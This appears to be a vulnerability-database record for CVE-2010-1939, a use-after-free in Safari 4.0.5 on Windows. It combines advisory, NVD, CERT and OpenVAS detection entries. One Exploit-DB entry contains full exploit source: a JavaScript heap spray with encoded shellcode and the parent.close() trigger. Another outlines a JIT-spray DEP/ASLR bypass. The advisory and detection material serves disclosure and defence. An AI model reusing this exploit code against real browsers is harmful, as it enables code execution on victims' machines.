Apple Safari 4.0.5 for Windows (and probably earlier) allows remote attackers to execute arbitrary code by enticing the user to open a crafted HTML document. The crafted HTML page can create a pop-up window using the window.open() method, and then call the parent window's window.close() method, thereby triggering the vulnerability due to an invalid pointer.
Resolution
Enable the browser pop-up blocker (this is normally enabled by default in Safari). Consider disabling JavaScript in Safari. Upgrade when a fixed release becomes available.
The exploit web page must be the first page loaded into the Apple Safari browser instance on the target.
Pop-Up windows must be enabled on the target Apple Safari browser, i.e., disable the pop-up blocker.
The vulnerability is triggered when the user closes the pop-up window with [Alt + F4]. It may take a longer time than normal to establish the shell session.
Platforms
Windows
{"enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "vulnersScore": 9.3}, "reporter": "SAINT Corporation", "id": "SAINT:72C046E8C4B49955C9B463BA037E1F63", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "published": "2010-05-28T00:00:00", "history": [], "bulletinFamily": "exploit", "viewCount": 2, "objectVersion": "1.2", "modified": "2010-05-28T00:00:00", "hash": "b4d4dd3db6680400abd7851f722884c5819150091f2cb4a946d2dda4f599fee2", "references": [], "cvelist": ["CVE-2010-1939"], "description": "Added: 05/28/2010 \nCVE: [CVE-2010-1939](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1939>) \nBID: [39990](<http://www.securityfocus.com/bid/39990>) \nOSVDB: [64482](<http://www.osvdb.org/64482>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. \n\n### Problem\n\nApple Safari 4.0.5 for Windows (and probably earlier) allows remote attackers to execute arbitrary code by enticing the user to open a crafted HTML document. The crafted HTML page can create a pop-up window using the window.open() method, and then call the parent window's window.close() method, thereby triggering the vulnerability due to an invalid pointer. \n\n### Resolution\n\nEnable the browser pop-up blocker (this is normally enabled by default in Safari). Consider disabling JavaScript in Safari. Upgrade when a fixed release becomes available. \n\n### References\n\n<http://secunia.com/advisories/39670> \n<http://www.kb.cert.org/vuls/id/943165> \n\n\n### Limitations\n\nExploit works on Apple Safari 4.0.5 for Windows. \n\nThe exploit web page must be the first page loaded into the Apple Safari browser instance on the target. \n\nPop-Up windows must be enabled on the target Apple Safari browser, i.e., disable the pop-up blocker. \n\nThe vulnerability is triggered when the user closes the pop-up window with [Alt + F4]. It may take a longer time than normal to establish the shell session. \n\n### Platforms\n\nWindows \n \n\n", "type": "saint", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/safari_parent_close_invalid_pointer", "lastseen": "2016-10-03T15:01:55", "edition": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "5022329f99c7416ff8698aaca8f6707c", "key": "cvelist"}, {"hash": "a421d56f3544d1a7f5097c7065c4867f", "key": "cvss"}, {"hash": "594c69348220463145277527d3bcd0d5", "key": "description"}, {"hash": "72c046e8c4b49955c9b463ba037e1f63", "key": "href"}, {"hash": "86510ed53691b7908974119505cd05ba", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "86510ed53691b7908974119505cd05ba", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "05eb9658955060eaf0d5f69692f1cd0d", "key": "title"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "title": "Apple Safari parent.close() Invalid Pointer Code Execution"}
{"cve": [{"lastseen": "2017-09-19T13:36:58", "references": ["http://www.kb.cert.org/vuls/id/943165", "http://securitytracker.com/id?1023958", "http://www.securityfocus.com/bid/39990", "http://reviews.cnet.com/8301-13727_7-20004709-263.html", "http://www.vupen.com/english/advisories/2010/1097", "http://h07.w.interia.pl/Safari.rar"], "description": "Use-after-free vulnerability in Apple Safari 4.0.5 on Windows allows remote attackers to execute arbitrary code by using window.open to create a popup window for a crafted HTML document, and then calling the parent window's close method, which triggers improper handling of a deleted window object.", "edition": 2, "reporter": "NVD", "published": "2010-05-13T18:30:00", "title": "CVE-2010-1939", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:58", "vector": "NONE", "value": 9.3}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:6748", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6748"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-1939"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:6748", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:6748"}], "modified": "2017-09-18T21:30:53", "cpe": ["cpe:/a:apple:safari:4.0.5"], "id": "CVE-2010-1939", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1939", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2018-08-31T00:08:18", "references": [], "description": "Added: 05/28/2010 \nCVE: [CVE-2010-1939](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1939>) \nBID: [39990](<http://www.securityfocus.com/bid/39990>) \nOSVDB: [64482](<http://www.osvdb.org/64482>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. \n\n### Problem\n\nApple Safari 4.0.5 for Windows (and probably earlier) allows remote attackers to execute arbitrary code by enticing the user to open a crafted HTML document. The crafted HTML page can create a pop-up window using the window.open() method, and then call the parent window's window.close() method, thereby triggering the vulnerability due to an invalid pointer. \n\n### Resolution\n\nEnable the browser pop-up blocker (this is normally enabled by default in Safari). Consider disabling JavaScript in Safari. Upgrade when a fixed release becomes available. \n\n### References\n\n<http://secunia.com/advisories/39670> \n<http://www.kb.cert.org/vuls/id/943165> \n\n\n### Limitations\n\nExploit works on Apple Safari 4.0.5 for Windows. \n\nThe exploit web page must be the first page loaded into the Apple Safari browser instance on the target. \n\nPop-Up windows must be enabled on the target Apple Safari browser, i.e., disable the pop-up blocker. \n\nThe vulnerability is triggered when the user closes the pop-up window with [Alt + F4]. It may take a longer time than normal to establish the shell session. \n\n### Platforms\n\nWindows \n \n\n", "edition": 3, "reporter": "SAINT Corporation", "published": "2010-05-28T00:00:00", "title": "Apple Safari parent.close() Invalid Pointer Code Execution", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1939"], "modified": "2010-05-28T00:00:00", "id": "SAINT:CA6905BBAD25DF95445E777989303FCF", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/safari_parent_close_invalid_pointer", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:06", "references": [], "edition": 1, "description": "Added: 05/28/2010 \nCVE: [CVE-2010-1939](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1939>) \nBID: [39990](<http://www.securityfocus.com/bid/39990>) \nOSVDB: [64482](<http://www.osvdb.org/64482>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. \n\n### Problem\n\nApple Safari 4.0.5 for Windows (and probably earlier) allows remote attackers to execute arbitrary code by enticing the user to open a crafted HTML document. The crafted HTML page can create a pop-up window using the window.open() method, and then call the parent window's window.close() method, thereby triggering the vulnerability due to an invalid pointer. \n\n### Resolution\n\nEnable the browser pop-up blocker (this is normally enabled by default in Safari). Consider disabling JavaScript in Safari. Upgrade when a fixed release becomes available. \n\n### References\n\n<http://secunia.com/advisories/39670> \n<http://www.kb.cert.org/vuls/id/943165> \n\n\n### Limitations\n\nExploit works on Apple Safari 4.0.5 for Windows. \n\nThe exploit web page must be the first page loaded into the Apple Safari browser instance on the target. \n\nPop-Up windows must be enabled on the target Apple Safari browser, i.e., disable the pop-up blocker. \n\nThe vulnerability is triggered when the user closes the pop-up window with [Alt + F4]. It may take a longer time than normal to establish the shell session. \n\n### Platforms\n\nWindows \n \n\n", "reporter": "SAINT Corporation", "published": "2010-05-28T00:00:00", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "Apple Safari parent.close() Invalid Pointer Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1939"], "modified": "2010-05-28T00:00:00", "id": "SAINT:8BE66E225290861FCE73B9867488A02A", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/safari_parent_close_invalid_pointer", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T16:55:53", "osvdbidlist": ["64482"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Safari 4.0.5 parent.close() Memory Corruption exploit (w/ASLR and DEP bypass). CVE-2010-1939. Remote exploit for windows platform", "reporter": "Alexey Sintsov", "published": "2010-05-15T00:00:00", "type": "exploitdb", "title": "Safari 4.0.5 - parent.close Memory Corruption Exploit ASLR and DEP bypass", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1939"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-05-15T00:00:00", "id": "EDB-ID:12614", "href": "https://www.exploit-db.com/exploits/12614/", "sourceData": "Download:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12614.zip (safari_parent_close_sintsov.zip)\r\n\r\nUnzip and run START.htm\r\n\r\nThis exploit use JIT-SPRAY for DEP and ASLR bypass.\r\njit-shellcode: system(\"notepad\")\r\n\r\n0day.html - use 0x09090101 address for CALL JITed shellcode.\r\n\r\n\r\nSTART.htm -> iff.htm -> if1.htm -> 0day.html\r\n| |\r\n| |\r\nJIT-SPRAY parent.close();\r\n0x09090101 - JITed * ESI=0x09090101\r\nshellcode * CALL ESI\r\n\r\nBy Alexey Sintsov\r\nfrom\r\nDigital Security Research Group\r\n\r\n[www.dsecrg.com]\r\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/12614/"}, {"lastseen": "2016-02-01T16:49:34", "osvdbidlist": ["64482"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Apple Safari 4.0.5 parent.close() (memory corruption) 0day Code Execution Exploit. CVE-2010-1939. Remote exploit for windows platform", "reporter": "Krystian Kloskowski", "published": "2010-05-11T00:00:00", "type": "exploitdb", "title": "Apple Safari 4.0.5 - parent.close memory corruption Code Execution Exploit 0day", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1939"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-05-11T00:00:00", "id": "EDB-ID:12573", "href": "https://www.exploit-db.com/exploits/12573/", "sourceData": "<!-- \r\nApple Safari 4.0.5 parent.close() (memory corruption) 0day Code Execution Exploit\r\nBug discovered by Krystian Kloskowski (h07) <h07@interia.pl>\r\nTested on: Apple Safari 4.0.5 / XP SP2 Polish\r\nShellcode: Windows Execute Command (calc)\r\nLocal: Yes\r\nRemote: Yes (POPUP must be enabled [Ctrl+Shift+K])\r\nJust for fun ;)\r\n-->\r\n\r\n<!---------------------------------REMOTE.htm---------------------------------\r\n<script>\r\nwindow.open(\"0day.htm\"); //parent.close() activation\r\nself.close();\r\n</script>\r\n-----------------------------------REMOTE.htm-------------------------------->\r\n\r\n<!---------------------------------0day.htm---------------------------------->\r\n<h1>Alt + F4 :)</h1>\r\n\r\n<script>\r\nfunction make_buf(payload, len) {\r\n while(payload.length < (len * 2)) payload += payload;\r\n payload = payload.substring(0, len);\r\n return payload;\r\n}\r\n\r\nvar shellcode = unescape(\"%u9090%u9090\"+ //Windows Execute Command (calc)\r\n\"%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b\"+\r\n\"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca\"+\r\n\"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b\"+\r\n\"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040\"+\r\n\"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0\"+\r\n\"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a\"+\r\n\"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61%u0063\");\r\n\r\n\r\nbigblock = unescape(\"%u0D0D%u0D0D\");\r\nheadersize = 20;\r\nslackspace = headersize+shellcode.length\r\nwhile (bigblock.length<slackspace) bigblock+=bigblock;\r\nfillblock = bigblock.substring(0, slackspace);\r\nblock = bigblock.substring(0, bigblock.length-slackspace);\r\nwhile(block.length+slackspace<0x40000) block = block+block+fillblock;\r\nmemory = new Array();\r\nfor (i=0;i<1000;i++) memory[i] = block + shellcode;\r\n\r\nvar a = parent;\r\nvar buf = make_buf(\"AAAA\", 10000);\r\n\r\nfor(var i = 0; i <= 1; i++) {\r\n a.prompt(alert);\r\n a.prompt(buf);\r\n a.close();\r\n}\r\n</script>\r\n<!---------------------------------0day.htm---------------------------------->", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/12573/"}], "openvas": [{"lastseen": "2018-12-05T13:46:22", "references": ["http://support.apple.com/downloads", "http://www.exploit-db.com/exploits/11567", "http://secunia.com/advisories/39670", "http://xforce.iss.net/xforce/xfdb/56527", "http://securitytracker.com/alerts/2010/May/1023958.html", "http://xforce.iss.net/xforce/xfdb/56524", "http://www.vupen.com/english/advisories/2010/1097"], "pluginID": "1361412562310902025", "description": "The host is running Apple Saferi and is prone to multiple\n vulnerabilities.", "edition": 5, "reporter": "Copyright (c) 2010 SecPod", "published": "2010-03-23T00:00:00", "title": "Apple Saferi multiple vulnerabilities (Mar10)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1029", "CVE-2010-1939"], "modified": "2018-12-04T00:00:00", "id": "OPENVAS:1361412562310902025", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902025", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Apple Safari multiple vulnerabilities (Mar10)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Updated By: Antu Sanadi <santu@secpod.com> on 2010-18-2010\n# Added the CVE and related description.\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902025\");\n script_version(\"$Revision: 12653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-23 15:59:14 +0100 (Tue, 23 Mar 2010)\");\n script_cve_id(\"CVE-2010-1029\", \"CVE-2010-1939\", \"CVE-2010-1939\");\n script_bugtraq_id(38398, 39990);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Saferi multiple vulnerabilities (Mar10)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/39670\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/56524\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/56527\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/11567\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1097\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2010/May/1023958.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (c) 2010 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_mandatory_keys(\"AppleSafari/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to send a\nmalformed CSS stylesheet tag containing an overly long string, which leads to\napplication crash or possibly execute arbitrary code on the system.\");\n script_tag(name:\"affected\", value:\"Apple Saferi version 4.0.5 and lower\");\n script_tag(name:\"insight\", value:\"The flaws are cuased by,\n\n - Error in the 'CSSSelector()' function when handling CSS stylesheet tag\n containing an overly long string.\n\n - Improper bounds checking by the 'WebKit' library when processing CSS\n stylesheet tag containing an overly long string.\n\n - Use-after-free error when handling of a deleted window object, allows attackers\n to execute arbitrary code by using 'window.open' to create a popup window for\n a crafted HTML document, and then calling the parent window&qts close method.\n\n - Includes HTTP basic authentication credentials in an HTTP request if a web page\n that requires HTTP basic authentication redirects to a different domain.\");\n script_tag(name:\"solution\", value:\"Upgrade to Apple Saferi 5.0 or later.\");\n script_tag(name:\"summary\", value:\"The host is running Apple Saferi and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://support.apple.com/downloads\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafariVer = get_kb_item(\"AppleSafari/Version\");\nif(!safariVer){\n exit(0);\n}\n\n## Included version 4.0.5 because exploit is working\nif(version_is_less_equal(version:safariVer, test_version:\"5.31.22.7\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:09:59", "references": ["http://www.exploit-db.com/exploits/11567", "http://secunia.com/advisories/39670", "http://xforce.iss.net/xforce/xfdb/56527", "http://securitytracker.com/alerts/2010/May/1023958.html", "http://xforce.iss.net/xforce/xfdb/56524", "http://www.vupen.com/english/advisories/2010/1097"], "pluginID": "902025", "description": "The host is running Apple Saferi and is prone to multiple\n vulnerabilities.", "edition": 1, "reporter": "Copyright (c) 2010 SecPod", "published": "2010-03-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "title": "Apple Saferi multiple vulnerabilities (Mar10)", "type": "openvas", "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1029", "CVE-2010-1939"], "modified": "2017-02-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=902025", "id": "OPENVAS:902025", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln.nasl 5394 2017-02-22 09:22:42Z teissa $\n#\n# Apple Safari multiple vulnerabilities (Mar10)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Updated By: Antu Sanadi <santu@secpod.com> on 2010-18-2010\n# Added the CVE and related description.\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to send a\nmalformed CSS stylesheet tag containing an overly long string, which leads to\napplication crash or possibly execute arbitrary code on the system.\n\nImpact Level: System/Application\";\n\ntag_affected = \"Apple Saferi version 4.0.5 and lower\";\n\ntag_insight = \n\"The flaws are cuased by,\n - Error in the 'CSSSelector()' function when handling CSS stylesheet tag\n containing an overly long string.\n - Improper bounds checking by the 'WebKit' library when processing CSS\n stylesheet tag containing an overly long string.\n - Use-after-free error when handling of a deleted window object, allows attackers\n to execute arbitrary code by using 'window.open' to create a popup window for\n a crafted HTML document, and then calling the parent window&qts close method.\n - Includes HTTP basic authentication credentials in an HTTP request if a web page\n that requires HTTP basic authentication redirects to a different domain.\";\n\ntag_solution = \"Upgrade to Apple Saferi 5.0 or later,\nFor updates refer to http://support.apple.com/downloads\";\n\ntag_summary = \"The host is running Apple Saferi and is prone to multiple\n vulnerabilities.\";\n\nif(description)\n{\n script_id(902025);\n script_version(\"$Revision: 5394 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-22 10:22:42 +0100 (Wed, 22 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-23 15:59:14 +0100 (Tue, 23 Mar 2010)\");\n script_cve_id(\"CVE-2010-1029\", \"CVE-2010-1939\", \"CVE-2010-1939\");\n script_bugtraq_id(38398, 39990);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Saferi multiple vulnerabilities (Mar10)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/39670\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/56524\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/56527\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/11567\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1097\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/alerts/2010/May/1023958.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (c) 2010 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_require_keys(\"AppleSafari/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Get Apple Safari version from KB\nsafariVer = get_kb_item(\"AppleSafari/Version\");\nif(!safariVer){\n exit(0);\n}\n\n## Check for Apple Safari Version 4.0.5(5.31.22.7).\n## Included version 4.0.5 because exploit is working\nif(version_is_less_equal(version:safariVer, test_version:\"5.31.22.7\")){\n security_message(0);\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2018-12-25T20:18:09", "_object_types": ["robots.models.cert.CertBulletin", "robots.models.base.Bulletin"], "references": ["http://secunia.com/advisories/39670/"], "description": "### Overview \n\nApple Safari contains a vulnerability in the handling of window objects, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nApple Safari fails to properly handle references to window objects. Safari can allow a window object to be deleted, while references to the object may still exist. If JavaScript code then attempts to use the deleted window object, this can result in the use of an invalid pointer. This pointer can be controlled by an attacker through the use of JavaScript.\n\nExploit code for this vulnerability is publicly available. We have confirmed Apple Safari 4.0.5 on the Windows platform to be vulnerable. Other versions may also be affected. \n \n--- \n \n### Impact \n\nBy convincing a victim to view an HTML document (webpage, HTML email, or email attachment) with Apple Safari, an attacker could run arbitrary code with the privileges of the user running the application. \n \n--- \n \n### Solution \n\n**Apply an update** \nThis issue is addressed in Safari 5.0 and 4.1. Please see Apple document [HT4196](<http://support.apple.com/kb/HT4196>) for more details. \n \n--- \n \n**Disable JavaScript**\n\n \nThis issue can be mitigated by disabling JavaScript in Apple Safari. Please see the [Securing Your Web Browser](<http://www.cert.org/tech_tips/securing_browser/#ssecurity>) document for more details. \n \n**Do not follow unsolicited links** \n \nIn order to convince users to visit their sites, attackers often use URL encoding, IP address variations, long URLs, intentional misspellings, and other techniques to create misleading links. Do not click on unsolicited links received in email, instant messages, web forums, or internet relay chat (IRC) channels. Type URLs directly into the browser to avoid these misleading links. While these are generally good security practices, following these behaviors will not prevent exploitation of this vulnerability in all cases, particularly if a trusted site has been compromised or allows cross-site scripting. \n \n--- \n \n### Vendor Information\n\n943165\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Apple Inc. \n\nUpdated: July 27, 2010 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThis issue is addressed in Safari 5.0 and 4.1. Please see Apple document [HT4196](<http://support.apple.com/kb/HT4196>) for more details.\n\n### Vendor References\n\n<http://support.apple.com/kb/HT4196>\n\n### Addendum\n\nThis issue can be mitigated by disabling JavaScript in Apple Safari. Please see the [Securing Your Web Browser](<http://www.cert.org/tech_tips/securing_browser/#ssecurity>) document for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23943165 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n<http://secunia.com/advisories/39670/>\n\n### Credit\n\nThis vulnerability was publicly disclosed by Krystian Kloskowski. \n\nThis document was written by Will Dormann. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2010-1939, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1939>) [CVE-2010-1750](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1750>) \n---|--- \n**Severity Metric:****** | 20.41 \n**Date Public:** | 2010-05-07 \n**Date First Published:** | 2010-05-10 \n**Date Last Updated: ** | 2010-07-27 11:56 UTC \n**Document Revision: ** | 16 \n", "reporter": "Krystian Kloskowski", "published": "2010-05-10T00:00:00", "type": "cert", "title": "Apple Safari window object invalid pointer vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "info", "cvelist": ["CVE-2010-1750", "CVE-2010-1939"], "_object_type": "robots.models.cert.CertBulletin", "modified": "2010-07-27T11:56:00", "id": "VU:943165", "href": "https://www.kb.cert.org/vuls/id/943165", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
